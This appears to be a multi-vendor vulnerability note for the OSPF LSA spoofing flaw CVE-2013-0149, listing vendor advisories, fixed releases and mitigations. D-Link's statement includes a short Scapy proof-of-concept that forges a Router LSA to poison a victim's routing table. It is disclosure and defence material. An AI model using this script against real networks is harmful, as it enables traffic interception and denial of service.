Notified:  June 13, 2013 Updated: August 05, 2013

Status

Affected

Vendor Statement

TECHNICAL SUPPORT BULLETIN July 25, 2013 TSB 2013-165- A SEVERITY: Low – Informational PRODUCTS AFFECTE D: Brocade MLX Series running NetIron SW Brocade NetIron XMR Series running NetIron SW Brocade NetIron CER Series running NetIron SW Brocade NetIron CES Series running NetIron SW Brocade VDX Series running Network OS 3.x and later SW Brocade FastIron Series running FastIron SW Brocade ICX Series running FastIron SW Brocade TurboIron Series running FastIron or TurboIron SW Brocade BigIron RX Series running BigIron RX SW Brocade ADX Series and JetCore Series running ServerIron SW Brocade Vyatta vRouter CORRECTED IN RELEASE: See list of releases below. BULLETIN OVERVIEW A security vulnerability, US-CERT Ref VU#229804, has been identified in the OSPF protocol. This vulnerability has a CVSS score of 9.3 and is documented in the National Vulnerability Database as CVE-2013-0149. See http://nvd.nist.gov/home.cfm for details. Brocade produces and publishes Technical Support Bulletins to OEMs, partners and customers that have a direct, entitled, support relationship in place with Brocade Please contact your primary service provider for further information regarding this topic and applicability for your environment. PROBLEM STATEMENT A security vulnerability, US-CERT Ref VU#229804, has been identified in the OSPF protocol. This vulnerability requires that the attacker already controls a router within the AS. RISK ASSESSMENT The listed products are exposed to this vulnerability in the OSPF protocol, where the attacker already has control of a router in the AS. This vulnerability has a CVSS score of 9.3. SYMPTOMS An attacker who has gained control of a router within a given AS can arbitrarily poison the routing tables of all other routers in the AS. This can facilitate traffic subversion, black hole, etc. The attacker can cause attacks through a crafted illegal OSPF router LSA (type-1); where the link state ID & router ID in the LSA is not same; leading to corruption of routing table in the routers. The crafted Router LSA must come from a source IP of an OSPF peer; in other words, spoofing a legitimate OSPF peer. OR the router LSA is sent in the interface where an OSPF peer is existing already. WORKAROUND There is no workaround. However if users can physically secure their network/routers, the chance of this attack is quite low. The recommendations are: a) Physically secure the access to network routers, and links between routers. b) Only allow passive OSPF protocols on interfaces with user/host connections, (i.e. leaf interfaces). c) Enable OSPF MD5 authentication This is not considered completely secure, but it should make the attack more difficult. CORRECTIVE ACTION See http://My.Brocade.com for the appropriate SW release(s) as listed below, please contact your account team or Brocade Support if you have further questions. Affected Products:  Brocade MLX Series  Brocade NetIron XMR Series  Brocade NetIron CER Series  Brocade NetIron CES Series SW Releases with problem resolved  NetIron 05.2.00k and later  NetIron 05.3.00f and later  NetIron 05.4.00e and later  NetIron 05.5.00d and later Reference Defect ID: 468326 Affected Products:  Brocade VDX Series SW Releases with problem resolved  Network OS 3.0.1c and later  Network OS 4.0.0a and later Reference Defect ID: 466022 Affected Products:  Brocade FastIron Series  Brocade ICX Series  Brocade TurboIron Series SW Releases with problem resolved  FastIron 7.2.02k and later  FastIron 7.3.00g and later  FastIron 07.4.00d and later  FastIron 08.0.00b and later Reference Defect ID: 466801 Affected Products:  Brocade BigIron RX Series SW Releases with problem resolved  BigIron RX 2.7.02p and later  BigIron RX 02.8.00f and later  BigIron RX 02.9.00c and later Reference Defect ID: 468497 Affected Products:  Brocade ADX Series and JetCore Series SW Releases with problem resolved  ServerIron JetCore 10.2.02d  ServerIron JetCore 11.0.00k  ServerIron ADX 12.3.01k  ServerIron ADX 12.4.00k  ServerIron ADX 12.5.01a Reference Defect ID (ADX): 469347 Reference Defect ID (JetCore): 111372 Affected Products:  Brocade Vyatta vRouter For customers running on Amazon Web Services this problem has been resolved. SW Releases with problem resolved  Brocade Vyatta vRouter 6.6R1

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Notified:  May 22, 2013 Updated: August 05, 2013

Status

Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

Cisco has provided patches for this vulnerability, please check the URL below for details.

Vendor References

• http://tools.cisco.com/security/center/viewAlert.x?alertId=30210

Notified:  May 28, 2013 Updated: August 05, 2013

Status

Affected

Vendor Statement

1. Advisory Information Title: Open Shortest Path First (OSPF) Protocol does not specify unique LSA lookup identifiers D-Link ID: DLINK-2013-VUL0213 Advisory URL: TBD prior to Aug. 1, 2013 Date published: August 1, 2013 Date of last update: 7/29/13 (will update on saving document) Reported by: CERT Release mode: Coordinated Release 2. Vulnerability Information Class: CWE-694 Impact: Critical Remotely Exploitable: Possible, but would require access via other product (s) Locally Exploitable: Yes CVE Name: CVE-2013-0149 3. Vulnerability Description The Open Shortest Path First (OSPF) protocol does not specify unique Link State Advertisement (LSA) lookup identifiers, which allow an attacker to intercept traffic or conduct a Denial of Service (DoS) attack. This vulnerability can allow an attacker to re-route traffic through their own router, compromising the confidentiality of the data, or to conduct a Denial of Service attack against a router, dropping all traffic. 4. Vulnerable Packages The following is the list of known affected devices and the associated firmware (confirmed by D-Link). This will be updated as needed if additional units effected. 1. DES-3810-28 – R2.20.B017 (HW Not available in the US) 5. Vendor Information, Solutions and Workarounds D-Link distributes a number of devices which could potentially be affected by this vulnerability; chiefly, any L3 managed switch that supports OSPF has the possibility of being subject to this attack. D-Link is working to reduce the potential impact of this vulnerability, which is a result of an ambiguous standard. Currently we advise the following: As always, adhering to best practices will be the strongest defense against attacks. As long as your physical devices, networks, and protocols are secured, it will be very difficult for an attacker to insert a rogue LSA to initiate this type of attack. First, this vulnerability does not defeat cryptographic (MD5) authentication, we recommend a strong MD5 authentication key as your best defense. We also recommend that administrators enable the OSPF passive interface feature to stop sending or receiving routing table updates on interfaces that do not participate in OSPF. Finally, we recommend that networks use MAC-based Access Control (MAC) to authenticate devices before they are able to communicate with the network. The MAC feature is a client-less design so there is no need to install extra software on a user’s computer, and ensures that only devices on a whitelist will have access to the network. When used in conjunction with common security best practices, it can help to strongly limit the possible vectors of attack. D-Link is monitoring the situation for an update to the standard that can be implemented to protect potentially affected devices. 6. Credits Dr. Gabi Nakibly - NEWRSC, Rafael - Advanced Defense Systems Ltd. Eitan Menahem - Telekom Innovation Laboratories, Ben Gurion University Ariel Waizel - Telekom Innovation Laboratories, Ben Gurion University Prof. Yuval Elovici - Telekom Innovation Laboratories, Ben Gurion University The publication of this advisory was not coordinated with forementioned 7. Technical Description / Proof of Concept Code 7.1. OSPF “Fight Back” is triggered by LSAs with matching Router ID only, and so can be evaded by using non matching Router ID and Link State ID on a rogue LSA. Routing lookup uses only the Link State ID field, and so may, depending on implementation, result in selecting the rogue LSA before the valid LSA. scappy proof of concept attack script attacker_source_ip = "192.168.13.1" attacker_router_id = "192.168.18.1" victim_destination_ip = "192.168.13.3" victim_router_id = "192.168.37.3" false_adv_router = "192.168.27.11" seq_num = 0x80000004L R3_FALSE_LSA = IP(src=attacker_source_ip, dst=victim_destination_ip) \ /OSPF_Hdr(src=attacker_router_id) \ /OSPF_LSUpd(lsalist=[ \ OSPF_Router_LSA(options=0x22, type=1, id=victim_router_id, adrouter=false_adv_router, seq=seq_num, linklist=[ \ OSPF_Link(id="192.168.37.7", data="192.168.37.3", type=2, metric=1), \ OSPF_Link(id="192.168.13.3", data="192.168.13.3", type=2, metric=1), \ OSPF_Link(id="192.168.50.0", data="255.255.255.0", type=3, metric=3) \ send(R3_FALSE_LSA, iface="eth0") 8. Report Timeline • May 28, 2013 – Notification by Cert of the issue • May 28, 2013 – Notify Qualified D-Link Resources of issue • June 6, 2013 – Cert notified embargo date changed to July 30 • Jun 6, 2013 – D-Link Request Cert to resend details • June 11, 2013 – D-Link receives details • July 29, 2013 – Cert notified embargo date changed to Aug 1 • July 29, 2013 – D-Link Sends Vulnerability Response Report to Cert • July 30, 2013 – D-Link Post Report for effected Products 9. References [1] CVE-229804-2013.pdf – Owning the Routing Table Part II 10. About D-Link D-Link is the global leader in connectivity for home, small business, mid- to large-sized enterprise environments, and service providers. An award-winning designer, developer, and manufacturer, D-Link implements and supports unified network solutions that integrate capabilities in switching, wireless, broadband, storage, IP Surveillance, and cloud-based network management. For more information visit www.dlink.com, or connect with D-Link on Facebook (www.facebook.com/dlink) and Twitter (www.twitter.com/dlink). 11. Disclaimer D-Link and the D-Link logo are trademarks or registered trademarks of D-Link Corporation or its subsidiaries. All other third-party marks mentioned herein may be trademarks of their respective owners. Copyright © 2013. D-Link. All Rights Reserved. References Authors: Patrick Cline - Patrick.Cline@dlink.com William Brown – William.Brown@dlink.com

Vendor Information

Please see DLINK-2013-VUL0213.

Notified:  May 28, 2013 Updated: August 19, 2013

Status

Affected

Vendor Statement

Product Advisory Note - https://cp-enterasys.kb.net/article.aspx?article=15134&p=1

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

• https://cp-enterasys.kb.net/article.aspx?article=15134&p=1

Notified:  May 28, 2013 Updated: July 30, 2013

Status

Affected

Vendor Statement

Extreme networks' EXOS implementation of OSPF is susceptible to the vulnerability reported in VU#229804. This vulnerability will be fixed in future EXOS release.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Notified:  May 28, 2013 Updated: August 05, 2013

Status

Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

IBM has provided updates for multiple products, please check the URLs below for details.

Vendor References

• http://www-912.ibm.com/systems/electronic/support/s_dir/slkbase.nsf/docNumber/677961906
• http://www-01.ibm.com/support/docview.wss?uid=isg3T1019716

Notified:  May 10, 2013 Updated: December 03, 2013

Status

Affected

Vendor Statement

LEGACY ADVISORY ID: PSN-2013-08-987 PRODUCT AFFECTED: All Juniper Networks platforms running Junos Operating System software, JunosE Operating System software, and ScreenOS software PROBLEM: A vulnerability has been discovered in the OSPF (Open Shortest Path First) protocol that allows a remote attacker to insert, update, or delete routes in the OSPF database. Juniper has worked to provide fixes for all supported code that is vulnerable to this issue. The issue lies in the OSPF protocol (RFC 2328: http://www.rfc-editor.org/rfc/rfc2328.txt). OSPF does not specify that the 'Link State ID' and 'Advertising Router' fields need to match when a router receives an OSPF link-state advertisement (LSA). This limitation of the protocol specification would allow for an attacker to inject false routes into the OSPF database. This issue doesn't exist if the OSPF configuration of a router is set to use MD5 Authentication, or if a filter is used to block external parties from sending OSPF link-state update (LSU) packets. This issue also does not apply to passive OSPF interfaces or interfaces that are not configured for OSPF. This issue was discovered by an external security researcher. No other Juniper Networks products or platforms are affected by this issue. This issue has been assigned CVE-2013-0149. SOLUTION: Releases containing (or will contain) the fix specifically include: 13.1R3, 13.2X50-D10, 12.3R3, 12.2R5, 12.1R7, 12.1X45-D10, 12.1X44-D15, 11.4R8, 10.4R15, and all subsequent releases. In addition, all Junos OS software releases built on or after 2013-07-25 will also have fixed this specific issue. Customers can confirm the build date of any Junos OS release by issuing the command 'show version detail'. All JunosE software releases built on or after 2013-07-25 have fixed this specific issue. Please contact JTAC to request a patch or hotfix for fixes on all other supported releases of code. Software updates to ScreenOS have been released to resolve this issue. Releases containing the fix include ScreenOS 5.4.0r28a, 6.2.0r17a, and 6.3.0r14a. This issue is being tracked as PR 878639 (Junos), CQ95773 (JunosE), and PR 895456 (ScreenOS). KB16765 - "In which releases are vulnerabilities fixed?" describes which release vulnerabilities are fixed as per our End of Engineering and End of Life support policies. WORKAROUND: Juniper recommends that customers use MD5 authentication when configuring OSPF. MD5 authentication completely mitigates this issue as the router will not accept an LSA without the correct MD5 auth value. It is good security practice to limit the exploitable attack surface of critical infrastructure networking equipment. Use access lists or firewall filters on physical interfaces (not loopback) to limit access to the router via OSPF unless necessary. Customers can request a hotfix for this issue on JunosE may do so by contacting JTAC. IMPLEMENTATION: RELATED LINKS: KB16613: Overview of the Juniper Networks SIRT Monthly Security Bulletin Publication Process KB16765: In which releases are vulnerabilities fixed? KB16446: Common Vulnerability Scoring System (CVSS) and Juniper's Security Advisories. Report a Vulnerability - How to Contact the Juniper Networks Security Incident Response Team CVE-2013-0149 CVSS SCORE: 7.8 (AV:N/AC:M/Au:N/C:N/I:P/A:C) RISK LEVEL: High RISK ASSESSMENT: This issue could allow an remote attacker the ability to modify an OSPF database. For the issue to take place the attacker would need to have unfiltered access to an OSPF interface that is not using MD5 authentication. The attacker would be able to add routes, overwrite routes, and also clear the OSPF database. This attack could potentially allow an attacker to cause a denial of service or reroute traffic. ACKNOWLEDGEMENTS: Juniper SIRT would like to acknowledge and thank Gabi Nakibly for responsibly reporting this vulnerability to CERT/CC who coordinated the multi-vendor response.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

• http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10582&cat=SIRT_1&actp= LIST

Notified:  May 28, 2013 Updated: September 10, 2013

Status

Affected

Vendor Statement

We provide information on this issue at the following URL: http://jpn.nec.com/security-info/secinfo/nv13-006.html (only in Japanese)

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

• http://jpn.nec.com/security-info/secinfo/nv13-006.html

Notified:  May 28, 2013 Updated: October 16, 2013

Status

Affected

Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

Affected products include: Oracle Sun Blade 6000 10GBE switched NEM 1.2, Sun Network 10GBE Switch 72P 1.2, Oracle Switch ES1-24 1.3. A patch is available at the following link.

Vendor References

• http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html

Notified:  May 10, 2013 Updated: August 05, 2013

Status

Affected

Vendor Statement

TECHNICAL SUPPORT BULLETIN July 25, 2013 TSB 2013-165- A SEVERITY: Low – Informational PRODUCTS AFFECTED: Brocade MLX Series running NetIron SW Brocade NetIron XMR Series running NetIron SW Brocade NetIron CER Series running NetIron SW Brocade NetIron CES Series running NetIron SW Brocade VDX Series running Network OS 3.x and later SW Brocade FastIron Series running FastIron SW Brocade ICX Series running FastIron SW Brocade TurboIron Series running FastIron or TurboIron SW Brocade BigIron RX Series running BigIron RX SW Brocade ADX Series and JetCore Series running ServerIron SW Brocade Vyatta vRouter CORRECTED IN RELEASE: See list of releases below. BULLETIN OVERVIEW A security vulnerability, US-CERT Ref VU#229804, has been identified in the OSPF protocol. This vulnerability has a CVSS score of 9.3 and is documented in the National Vulnerability Database as CVE-2013-0149. See http://nvd.nist.gov/home.cfm for details. Brocade produces and publishes Technical Support Bulletins to OEMs, partners and customers that have a direct, entitled, support relationship in place with Brocade Please contact your primary service provider for further information regarding this topic and applicability for your environment. PROBLEM STATEMENT A security vulnerability, US-CERT Ref VU#229804, has been identified in the OSPF protocol. This vulnerability requires that the attacker already controls a router within the AS. RISK ASSESSMENT The listed products are exposed to this vulnerability in the OSPF protocol, where the attacker already has control of a router in the AS. This vulnerability has a CVSS score of 9.3. SYMPTOMS An attacker who has gained control of a router within a given AS can arbitrarily poison the routing tables of all other routers in the AS. This can facilitate traffic subversion, black hole, etc. The attacker can cause attacks through a crafted illegal OSPF router LSA (type-1); where the link state ID & router ID in the LSA is not same; leading to corruption of routing table in the routers. The crafted Router LSA must come from a source IP of an OSPF peer; in other words, spoofing a legitimate OSPF peer. OR the router LSA is sent in the interface where an OSPF peer is existing already. WORKAROUND There is no workaround. However if users can physically secure their network/routers, the chance of this attack is quite low. The recommendations are: a) Physically secure the access to network routers, and links between routers. b) Only allow passive OSPF protocols on interfaces with user/host connections, (i.e. leaf interfaces). c) Enable OSPF MD5 authentication This is not considered completely secure, but it should make the attack more difficult. CORRECTIVE ACTION See http://My.Brocade.com for the appropriate SW release(s) as listed below, please contact your account team or Brocade Support if you have further questions. Affected Products:  Brocade MLX Series  Brocade NetIron XMR Series  Brocade NetIron CER Series  Brocade NetIron CES Series SW Releases with problem resolved  NetIron 05.2.00k and later  NetIron 05.3.00f and later  NetIron 05.4.00e and later  NetIron 05.5.00d and later Reference Defect ID: 468326 Affected Products:  Brocade VDX Series SW Releases with problem resolved  Network OS 3.0.1c and later  Network OS 4.0.0a and later Reference Defect ID: 466022 Affected Products:  Brocade FastIron Series  Brocade ICX Series  Brocade TurboIron Series SW Releases with problem resolved  FastIron 7.2.02k and later  FastIron 7.3.00g and later  FastIron 07.4.00d and later  FastIron 08.0.00b and later Reference Defect ID: 466801 Affected Products:  Brocade BigIron RX Series SW Releases with problem resolved  BigIron RX 2.7.02p and later  BigIron RX 02.8.00f and later  BigIron RX 02.9.00c and later Reference Defect ID: 468497 Affected Products:  Brocade ADX Series and JetCore Series SW Releases with problem resolved  ServerIron JetCore 10.2.02d  ServerIron JetCore 11.0.00k  ServerIron ADX 12.3.01k  ServerIron ADX 12.4.00k  ServerIron ADX 12.5.01a Reference Defect ID (ADX): 469347 Reference Defect ID (JetCore): 111372 Affected Products:  Brocade Vyatta vRouter For customers running on Amazon Web Services this problem has been resolved. SW Releases with problem resolved  Brocade Vyatta vRouter 6.6R1

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Notified:  May 28, 2013 Updated: August 05, 2013

Status

Affected

Vendor Statement

Yamaha corporation provides information on this issue at the following URL. (Japanese only) http://www.rtpro.yamaha.co.jp/RT/FAQ/Security/VU96465452.html

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

• http://www.rtpro.yamaha.co.jp/RT/FAQ/Security/VU96465452.html